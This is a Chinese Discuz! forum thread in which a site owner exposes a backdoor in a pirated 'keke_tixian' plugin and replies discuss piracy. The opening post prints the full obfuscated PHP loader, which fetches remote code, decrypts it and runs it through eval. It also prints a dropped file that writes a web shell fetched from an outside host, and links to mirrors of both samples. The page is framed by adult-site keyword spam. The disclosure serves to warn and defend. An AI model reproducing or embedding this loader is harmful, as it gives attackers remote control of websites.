久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

12下一頁
返回列表 發(fā)帖
查看: 12575|回復: 13

【續(xù)集】魔趣吧的東西真的有后門木馬,揭秘用盜版的危害

2

主題

3

回帖

5

積分

初學乍練

貢獻
0 點
金幣
0 個
樓主
發(fā)表于 2020-6-30 20:23:56 | 只看樓主 |只看大圖 |倒序瀏覽 |閱讀模式
上次寫了一篇文章 披露了盜版市場的亂象 ,沒想到本人遭到魔趣吧的站長瘋狂的報復。我自己的網(wǎng)站已經(jīng)持續(xù)快10天魔趣吧的站長使用DDOS攻擊技術(shù),打不開了!因為在其網(wǎng)站進行了手機綁定,手機也整天被短信+電話轟炸!搞的我最近經(jīng)常要開飛行模式!
但是我是絕對不會像黑惡勢力低頭的,大不了我網(wǎng)站不做了,手機號碼不用了!

前文回顧:魔趣吧的東西好像真的有后門木馬,改了我dz的后臺密碼
http://m.9999xn.com/thread-5095-1-1.html

因為前面的那篇文章寫的比較概況,沒有列舉證據(jù)(導致其大肆誤導不明真相的群眾說我在造謠),今天我就來列舉一些證據(jù),并對已知的后門進行深入詳細的分析!
這可能是最后一篇曝光盜版市場亂象的文章了,因為我只是一個普普通通的站長!那些江湖經(jīng)驗豐富的站長我惹不起,我也見識了魔趣吧是如果把黑的說成白的!

他的理念就是只要對他有利的都是好文章,曝光他的都是在造謠他!

在正式進入主題之前,我想在說幾句題外話:先不說他有沒有干些見不得人的事,其損壞原創(chuàng)開發(fā)者權(quán)益,謀取自己的利益(俗稱:盜版),還有什么資格在那一副正人君子的模樣懟這個懟那個!

【下面才是今天要說的主題】
由于帶后門的資源有點多,今天我就隨便拿個在魔趣吧收費的資源,且我之前安裝過,受害的資源來做分析!

樣本下載鏈接:為了不給他打廣告,帖子ID: 9183 ,知道他網(wǎng)站的隨便打開一個帖子把id換成這個就可以定位到!

因為是VIP資源,所以我分享到了藍奏網(wǎng)盤:https://wws.lanzous.com/iH9IQe6jymf  密碼:c9mx

附件MD5值:C03B189CA9E0EA7F1229F609A48EC705
防止因為我的曝光,他會修改附件,然后狡辯!對本文有異議的朋友可以在本文發(fā)布不久的時候,前去下載對比MD5值后,并效驗是不是存在本文提到的后門木馬!

樣本插件名稱:積分提現(xiàn)中心 V1.2

木馬文件所在路徑:keke_tixian\function\function_core.php


木馬完整代碼:
  1. <?php
  2. function zm_diconv($str){
  3.   $encode = mb_detect_encoding($str, array(

  4.         "ASCII",

  5.         "UTF-8",

  6.         "GB2312",

  7.         "GBK",

  8.         "BIG5"

  9.     ));

  10.     if ($encode != CHARSET) {

  11.         //$keytitle = iconv($encode,CHARSET."//IGNORE",$str);

  12.         $keytitle = mb_convert_encoding($str, CHARSET, $encode);

  13.     }

  14.     if (!$keytitle) {

  15.         $keytitle = $str;

  16.     }

  17.     return $keytitle;

  18. }
  19. function caidi($oo){
  20.     $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
  21.         $forver=stripos($love,'d');
  22.         $forvere=stripos($love,'z');
  23.         $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
  24.         $forveres='DECODE';
  25.         $aini=substr($love,$forver,$forvere);//獲取方法函數(shù)名decrypt
  26.         $aini=$oo?$forveres:$aini;
  27.         return $aini;
  28. }
  29. function decrypt($data, $key = '721520') {
  30.                 global $_G;
  31.                 $key = $key ? $key : $_G['config']['security']['authkey'];
  32.                 $type = caidi($key);
  33.                 return authcode($data,$type, $key);
  34.                 }

  35. function contentz($svip) {
  36. if(function_exists('file_get_contents')) {
  37. $data = file_get_contents($svip);
  38. } else {
  39. $ch = curl_init();
  40. $timeout = 5;
  41. curl_setopt ($ch, CURLOPT_URL, $svip);
  42. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  43. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  44. $data = curl_exec($ch);
  45. curl_close($ch);
  46. }
  47. return $data;
  48. }
  49. $iloveyou = caidi($oo);
  50. eval($iloveyou(strip_tags(contentz($love))));
  51. ?>
復制代碼
關(guān)鍵代碼:
  1. $iloveyou = caidi($oo);
  2. eval($iloveyou(strip_tags(contentz($love))));
復制代碼


有了這些信息 我們下面進行分析(在這里大膽的猜測一下:文件完全是魔趣吧自己加進去的,正版可能就沒有這個文件,因為這個文件代碼全是和后門有關(guān)!和插件自身功能沒有關(guān)系)
在關(guān)鍵代碼前面的都是木馬偽裝所需要用到的函數(shù) 執(zhí)行過程如下:
1/----------------------

后門腳本執(zhí)行入口:keke_tixian\admin.inc.php
關(guān)鍵代碼在該文件第7行:引用后門文件并執(zhí)行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
解釋:只要安裝插件一打開后臺的插件設置,木馬就自動執(zhí)行了!

2/--------依次執(zhí)行----------


$iloveyou = caidi($oo);
解釋:定義一個名為   iloveyou 的變量  ,值為: caidi($oo)
調(diào)試: $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ,得到 iloveyou 的值等于:decrypt
備注:函數(shù) caidi 定義并賦值了 $love  作全局變量, love 的值等于:htt去p://zonekey.w掉in/b中ai文duseo.xml  (去掉中文)

3/--------依次執(zhí)行----------

eval($iloveyou(strip_tags(contentz($love))));

解釋:已知 iloveyou 的值等于:decrypt,得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));

分析函數(shù) contentz 得知該函數(shù) 是訪問遠程鏈接并返回內(nèi)容,相當于 curl
分析函數(shù) decrypt 得知該函數(shù) 是進行內(nèi)容解密,直接調(diào)用了DISCUZ自帶的解密函數(shù) authcode


解釋的解釋:代碼 eval($iloveyou(strip_tags(contentz($love)))); ,經(jīng)過層層分析,最終為:
執(zhí)行腳本 ( 解密 ( 訪問遠程代碼 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );

4/--------依次執(zhí)行----------

htt去p://zonekey.w掉in/b中ai文duseo.xml 該鏈接現(xiàn)在訪問返回的全部是 1111111111111111,所以無法繼續(xù)分析遠程的代碼是什么!

可能魔趣吧站長已經(jīng)知道我接下來會深入曝光他。所以暫時把遠程代碼先全部改成了 1111111111111111
即使是這樣!又如何? 執(zhí)行遠程腳本 有什么危害?相信做網(wǎng)站的都知道!這里我不進行科普!感興趣的站長可以百度自行科普:例:一句話木馬,菜刀!
下面的代碼是我網(wǎng)站自動多出來的一個文件:因為無法繼續(xù)分析,直接看結(jié)果
  1. <?php
  2. file_put_contents("schizwcingu.php",file_get_contents("http://iqqvps.com/xss.txt"));
復制代碼
上面的xss.txt  防止 魔趣吧站長 再去取消 我上傳到了 藍奏網(wǎng)盤 https://wws.lanzous.com/iPkAWe6na9c 密碼:i1nc

End/--------刨根問底--------

在前面一篇文章中提到過了  魔趣吧站長聲稱該木馬是源碼哥的!
但是既然干了,就干到底!
百度了一下 搜索 到 源碼哥  ,在他網(wǎng)站搜索 了一下 積分提現(xiàn)中心  果然找到一個一模一樣的版本!
花了20塊錢下載下來(真黑啊,1.2  這么舊的版本還賣20),不過花20塊錢 能讓大家看清,防止中木馬。也值得!

結(jié)局打臉: 沒有 keke_tixian\function\function_core.php  這個文件,因為是邊寫邊弄的,既然寫好了就這樣吧!
雖然沒有發(fā)現(xiàn)木馬,但是應該也是一丘之貉,還是呼吁大家不要用盜版!不要用盜版!不要用盜版!

PS:對魔趣吧站長傳播木馬,DDOS我的網(wǎng)站,短信+電話轟炸我的手機號 表示非常的鄙視!


希望官方管理員能夠曝光這篇文章,讓更多準備用盜版的站長、已經(jīng)在用盜版的站長。趕緊回頭是岸!
樣本已經(jīng)上傳到藍奏網(wǎng)盤,文章寫的不到位的地方,歡迎各路大神補充!



回復

使用道具 舉報

2

主題

3

回帖

5

積分

初學乍練

貢獻
0 點
金幣
0 個
沙發(fā)
 樓主| 發(fā)表于 2020-6-30 20:36:24 | 只看Ta
文中忘記說了!不能編輯 就占樓吧!
看圖打臉


1、保證無后門     
打臉:無后門!只是有木馬
不如:保證無后門,絕對有木馬!

2、魔趣吧修復后發(fā)布!
打臉:正版好好的東西,被魔趣吧修復一下就多了個后門木馬?
不如:魔趣吧增加木馬后發(fā)布

3、資源均經(jīng)測試,請放心使用!
打臉:放個木馬在你網(wǎng)站,你能放心?
不如:木馬功能已經(jīng)測試,請放心使用!零失誤!


4、官方認證圖標
打臉:魔趣吧官方正版木馬,請放心中毒!


回復

使用道具 舉報

2

主題

3

回帖

5

積分

初學乍練

貢獻
0 點
金幣
0 個
板凳
 樓主| 發(fā)表于 2020-6-30 20:39:11 | 只看Ta
申明:本文不是針對 可可 正版的應用  正版應用肯定是沒有木馬的!
本文說的是盜版的!


回復

使用道具 舉報

31

主題

6025

回帖

1萬

積分

應用開發(fā)者

貢獻
626 點
金幣
1444 個
QQ
地板
發(fā)表于 2020-6-30 20:53:04 | 只看Ta
簡單點說:無利不起早

開發(fā)者的利,自然是賣產(chǎn)品,也就是賣插件模板,為了多得利,自然要做好產(chǎn)品
站長的利,自然是通過程序賺錢或?qū)^(qū)流量最終變現(xiàn)(也許你現(xiàn)在不賺錢,但別說永遠不打算賺錢)
盜版站的利,要么是錢,要么是流量,但最終和站長是一樣的,還是變現(xiàn),如果打著所謂免費旗號,那么最終一定會在隱藏的地方來想辦法賺錢,那么很明顯,黑產(chǎn)是最簡單的選擇,那么后門木馬就不稀奇了。

賺錢可以,但請通過自己的勞動正當獲益,你要是自己寫代碼提供給站長,誰也沒權(quán)利指責你,但開發(fā)者費時費力的勞動所得,你偷去倒賣,這就很不道德了,并且不止是不道德,這是違法的。

再加上黑產(chǎn),那么就更加讓人憤怒了,也就是說兩頭吃。

無利不起早,為利無可厚非,但請緊守底線,尊重別人的勞動。

經(jīng)常有“站長”指責開發(fā)者賣的貴,不厚道。那么請你能寫出一樣的東西免費提供出來,但不能是偷別人的東西提供出來哦。當你能寫出一樣的東西的時候,并能始終免費提供,我向您投以真誠的敬意。

但別人通過大量的學習、探索、耗費精力和時間,勞動所得寫出的內(nèi)容,以此獲取回報,則不能予以譴責。我們自然應當感恩免費的饋贈,但也同時應當尊重勞動回報的需求。
回復

使用道具 舉報

4

主題

24

回帖

44

積分

初學乍練

貢獻
0 點
金幣
3 個
5#
發(fā)表于 2020-6-30 23:22:00 來自手機 | 只看Ta
以前貪便宜也是用盜版插件模版,安全中心三天兩頭的發(fā)出風險告警首頁老是被改,刪除了所有盜版插件模版,現(xiàn)在一直好好的
回復

使用道具 舉報

0

主題

7

回帖

25

積分

初學乍練

貢獻
0 點
金幣
17 個
6#
發(fā)表于 2020-6-30 23:46:45 | 只看Ta
魔趣我不知道 反正哪個源碼哥的肯定是有木馬。都自己修改內(nèi)容
回復

使用道具 舉報

22

主題

824

回帖

1128

積分

已臻大成

貢獻
27 點
金幣
80 個
7#
發(fā)表于 2020-7-1 02:59:19 | 只看Ta
幾百塊一個月上高防就行。
回復

使用道具 舉報

21

主題

500

回帖

1057

積分

應用開發(fā)者

貢獻
29 點
金幣
193 個
QQ
8#
發(fā)表于 2020-7-1 11:16:13 | 只看Ta
羅永浩 發(fā)表于 2020-7-1 02:59
幾百塊一個月上高防就行。

能舍得幾百塊一個月高防用盜版,何不花百十塊買個正版使用,不香嗎?
回復

使用道具 舉報

28

主題

284

回帖

387

積分

爐火純青

貢獻
5 點
金幣
35 個
QQ
9#
發(fā)表于 2020-7-1 20:56:10 | 只看Ta
嗯,當我看見你那個帖子的時候,發(fā)現(xiàn)一個叫做魔趣吧的用戶回復了你但被discuz管理員屏蔽了我就知道事情不簡單。我不站樓主和魔趣吧,我站discuz管理員的做法(放肆的大笑)
回復 1

使用道具 舉報

70

主題

106

回帖

279

積分

版主

貢獻
4 點
金幣
32 個
10#
發(fā)表于 2020-7-1 23:54:27 | 只看Ta
這故事引起了我的注意
回復

使用道具 舉報

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規(guī)則

  • 關(guān)注公眾號
  • 有償服務微信
  • 有償服務QQ

手機版|小黑屋|Discuz! 官方交流社區(qū) ( 皖I(lǐng)CP備16010102號 |皖公網(wǎng)安備34010302002376號 )|網(wǎng)站地圖|star

GMT+8, 2025-10-20 07:30 , Processed in 0.060163 second(s), 13 queries , Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2025 Discuz! Team.

關(guān)燈 在本版發(fā)帖
有償服務QQ
有償服務微信
返回頂部
快速回復 返回頂部 返回列表
久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线
成人精品国产福利| 国产欧美日韩一区二区三区| 国产一区二区在线视频| 奇米影视7777精品一区二区| 日本欧美韩国一区三区| 丝袜美腿高跟呻吟高潮一区| 天天影视涩香欲综合网 | 狠狠色丁香久久婷婷综合_中 | 久久久久高清| 久久国产精品久久w女人spa| 色中色一区二区| 在线这里只有精品| 精品视频一区 二区 三区| 在线观看欧美日本| 在线不卡中文字幕| 欧美mv日韩mv亚洲| 国产亚洲精品bt天堂精选| 亚洲国产精品99久久久久久久久 | 亚洲va国产va欧美va观看| 热久久久久久久| 国内成人免费视频| 成人a区在线观看| 欧美日韩一区二区三| 一本久久知道综合久久| 91久久精品日日躁夜夜躁欧美| 欧美性videosxxxxx| 日韩欧美中文字幕精品| 国产人久久人人人人爽| 亚洲欧美日韩一区二区| 亚洲一区二区三区免费视频| 老司机精品视频在线| 成人ar影院免费观看视频| 欧美女人交a| 国产精品日韩欧美一区二区三区| 欧美在线观看一二区| 久久婷婷成人综合色| 1024国产精品| 奇米精品一区二区三区在线观看| 懂色av一区二区在线播放| 国产精品国色综合久久| 久久精品伊人| 久久久久久久综合色一本| 亚洲欧美日韩一区| 久久99精品网久久| 欧美日韩一区二区三| 日本精品一区二区三区四区的功能| 精品国产一二三区| 亚洲国产你懂的| 成人自拍视频在线观看| 国产精品毛片| 精品免费国产一区二区三区四区| 亚洲激情在线播放| 国产河南妇女毛片精品久久久| 黄色综合网站| 日韩一区二区在线播放| 一区二区三区在线免费视频| 成人免费毛片高清视频| 久久午夜精品| 欧美激情一区二区三区四区| 久久超碰97人人做人人爱| 欧美午夜电影在线观看 | 国产精品看片你懂得| 蜜桃视频在线观看一区| 亚洲国产一区在线| 日韩视频123| 亚洲免费观看视频| 国产精品99久久久久| 亚洲欧美日韩在线综合| 久久免费的精品国产v∧| 美日韩一区二区| 亚洲精华国产欧美| 337p粉嫩大胆噜噜噜噜噜91av | 久久国产精品免费一区| 国产日产欧美一区| 国产美女精品一区二区三区| 亚洲专区在线| 国产日韩欧美精品电影三级在线| 国产在线播放一区| 美日韩在线观看| 一级中文字幕一区二区| 亚洲特色特黄| 日本一区二区三区在线不卡| 国产美女久久久久| 91福利在线看| 日韩精彩视频在线观看| 亚洲少妇诱惑| 亚洲特级片在线| 欧美99在线视频观看| ww久久中文字幕| 成人性生交大片免费看在线播放 | 青青草国产精品亚洲专区无| 亚洲在线网站| 亚洲自拍另类综合| 亚洲激情一区| 国产精品免费丝袜| 欧美日本亚洲韩国国产| 国产色婷婷亚洲99精品小说| 不卡大黄网站免费看| 欧美成人r级一区二区三区| 国产综合成人久久大片91| 在线亚洲人成电影网站色www| 亚洲va在线va天堂| 国产精品久久波多野结衣| 伊人开心综合网| 99xxxx成人网| 亚洲成人综合视频| 男人的天堂亚洲| 日本视频中文字幕一区二区三区| 久久亚洲国产精品日日av夜夜| 亚洲.国产.中文慕字在线| 国产日韩一区二区三区| 亚洲国产aⅴ天堂久久| 亚洲欧美日韩一区在线观看| 视频一区二区中文字幕| 91国产免费看| 国产一区 二区 三区一级| 欧美一级国产精品| 成人精品免费网站| 国产日韩欧美高清在线| 激情综合电影网| 一区二区日韩av| 色婷婷激情综合| 国产91清纯白嫩初高中在线观看| 日韩美女天天操| 97精品国产露脸对白| 国产精品乱码久久久久久| 亚洲小说欧美另类社区| 亚洲国产精品一区二区久久恐怖片| 久久久水蜜桃| 粉嫩av一区二区三区在线播放| 久久老女人爱爱| 亚洲国产日韩美| 欧美aa在线视频| 欧美成人激情免费网| 精品福利电影| 久久se精品一区二区| 久久男人中文字幕资源站| 亚洲精品1区2区| 黑人巨大精品欧美黑白配亚洲| 久久人人爽人人爽| 国产日韩一区二区三区在线播放| 久久精品av麻豆的观看方式| 精品久久一二三区| 国产精品久久777777毛茸茸| 国产一区亚洲一区| 中文乱码免费一区二区| 在线看不卡av| 欧美日韩成人| 精久久久久久久久久久| 日本一区二区不卡视频| 色婷婷综合久久久中文一区二区| 不卡一区中文字幕| 亚洲宅男天堂在线观看无病毒| 欧美日韩一区 二区 三区 久久精品| 91在线国产福利| 日韩高清一区二区| 国产亚洲污的网站| 国产精品久久久久9999高清| 国产一区二区三区精品欧美日韩一区二区三区 | av综合在线播放| 夜夜嗨av一区二区三区网页| 欧美另类变人与禽xxxxx| 欧美一区综合| 图片区日韩欧美亚洲| 26uuuu精品一区二区| 欧美影院一区二区| 1024亚洲| 99国产欧美久久久精品| 日本在线不卡视频| 中文字幕亚洲在| 91精品国产91久久久久久一区二区 | 爽爽淫人综合网网站| 亚洲欧洲另类国产综合| 日韩视频免费观看高清在线视频| 亚洲欧美日韩视频二区 | 欧美日韩一二三| 国产美女诱惑一区二区| 91免费在线视频观看| 另类成人小视频在线| 亚洲资源中文字幕| 最新国产の精品合集bt伙计| 久久久久久久综合色一本| 欧美日韩中文字幕一区二区| 亚洲人成免费| 韩日视频一区| 欧美欧美天天天天操| 99在线视频精品| 国产成人超碰人人澡人人澡| 蜜桃一区二区三区四区| 日韩中文字幕区一区有砖一区| 亚洲精品欧美综合四区| 久久亚洲一区二区三区明星换脸 | 亚洲美女偷拍久久| 粉嫩av一区二区三区粉嫩| 成人精品鲁一区一区二区| 美洲天堂一区二卡三卡四卡视频| 亚洲一区二区五区| 亚洲女人****多毛耸耸8| 中文字幕一区二区三区在线不卡| 久久久久久久久久看片|